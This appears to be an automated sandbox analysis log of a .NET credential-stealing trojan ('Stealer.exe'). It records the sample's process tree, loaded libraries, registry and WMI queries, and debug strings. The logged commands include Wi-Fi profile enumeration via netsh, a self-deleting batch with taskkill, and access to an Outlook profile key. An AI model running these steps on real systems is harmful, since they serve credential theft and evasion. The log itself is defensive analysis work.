    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081870F81_2_081870F8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0818C6E81_2_0818C6E8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08185F0A1_2_08185F0A
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081891281_2_08189128
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081849701_2_08184970
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08185D751_2_08185D75
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081863D01_2_081863D0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081899D31_2_081899D3
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081856131_2_08185613
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08184E351_2_08184E35
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08187E271_2_08187E27
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08189C501_2_08189C50
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08188AC81_2_08188AC8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0818A0E01_2_0818A0E0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08188B101_2_08188B10
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081821701_2_08182170
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0818AFB81_2_0818AFB8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08181FB01_2_08181FB0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081893D71_2_081893D7
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081893F01_2_081893F0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0818BDE81_2_0818BDE8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081851ED1_2_081851ED
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0819CB0F1_2_0819CB0F
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081972381_2_08197238
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_0819D0281_2_0819D028
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08197C201_2_08197C20
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081900401_2_08190040
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081924431_2_08192443
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081943D01_2_081943D0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08193F4C1_2_08193F4C
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08191A901_2_08191A90
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_081960D81_2_081960D8
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeCode function: 1_2_08191AF01_2_08191AF0
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 2948
    Source: T05Dk6G8fg.exe, 00000001.00000002.43972510147.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.0000000070A8B000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: lastOriginalFileName vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exe, 00000001.00000000.43795869954.00000000009D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs T05Dk6G8fg.exe
    Source: T05Dk6G8fg.exeBinary or memory string: OriginalFilenameStealer.exeJ vs T05Dk6G8fg.exe
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/19@2/2
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:304:WilStaging_02
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2956
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8292:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8292:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:120:WilError_03
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile created: C:\Users\user\AppData\Local\Temp\z4lniasp.nhsJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat
    Source: T05Dk6G8fg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2956)
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: T05Dk6G8fg.exeReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Users\user\Desktop\T05Dk6G8fg.exe "C:\Users\user\Desktop\T05Dk6G8fg.exe"
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 2956
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 2948
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 2956Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Users\user\Desktop\T05Dk6G8fg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
    Source: T05Dk6G8fg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: T05Dk6G8fg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: System.Windows.Forms.pdbL source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.ni.pdbRSDS source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.ni.pdb source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.pdb\ source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.ni.pdb source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.pdbi source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Security.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.IO.Compression.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Configuration.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.ni.pdbRSDS source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Core.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.pdbTL source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.ni.pdbRSDSX source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Windows.Forms.pdb source: T05Dk6G8fg.exe, 00000001.00000002.43990776194.00000000715AE000.00000020.00000001.01000000.00000008.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: mscorlib.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: mscorlib.ni.pdbRSDSrMV9 source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Net.Http.ni.pdb source: WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Drawing.pdb source: T05Dk6G8fg.exe, 00000001.00000002.44003035098.000000007178B000.00000020.00000001.01000000.00000007.sdmp, WERF69D.tmp.dmp.19.dr
    Source: Binary string: System.Management.pdb source: WERF69D.tmp.dmp.19.dr
